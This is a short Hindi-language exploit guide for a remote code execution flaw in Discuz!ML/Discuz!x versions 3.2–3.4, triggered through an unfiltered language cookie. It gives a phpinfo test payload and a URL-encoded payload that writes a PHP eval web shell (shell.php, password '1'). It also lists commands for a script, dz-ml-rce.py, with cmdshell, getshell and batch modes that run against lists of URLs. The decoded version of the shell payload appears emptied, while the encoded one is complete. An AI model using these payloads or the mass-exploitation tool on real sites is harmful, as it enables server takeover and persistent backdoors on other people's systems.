
प्रभावित सिस्टम और संस्करण: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4
प्रभावित सिस्टम और संस्करण: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 भेद्यता का कारण: Discuz!ML सिस्टम cookie में l द्वारा प्राप्त language पैरामीटर की सामग्री को फ़िल्टर नहीं करता है, जिससे स्ट्रिंग संयोजन (string concatenation) होता है और PHP कोड निष्पादित होता है।
cookie फ़ील्ड में xxxx_xxxx_language फ़ील्ड दिखाई देगा; मूल कारण यह है कि इस फ़ील्ड में इंजेक्शन मौजूद है, जिससे RCE होता है
पैकेट कैप्चर करके cookie के language का मान ढूंढें और उसे निम्न में संशोधित करें
xxxx_xxxx_language=sc'.phpinfo().'
getshell
%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27 वास्तव में यह है:
'.+file_put_contents('shell.php',urldecode('')).'
इससे पथ में shell.php उत्पन्न हो जाएगा, कनेक्शन पासवर्ड 1 है
============================================================================================================================================================== क्या भेद्यता मौजूद है, जाँच करें
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"
cmdshell मोड
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell
getshell मोड
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell
बैच जाँच
python dz-ml-rce.py -f urls.txt
बैच getshell
python dz-ml-rce.py -f urls.txt --getshell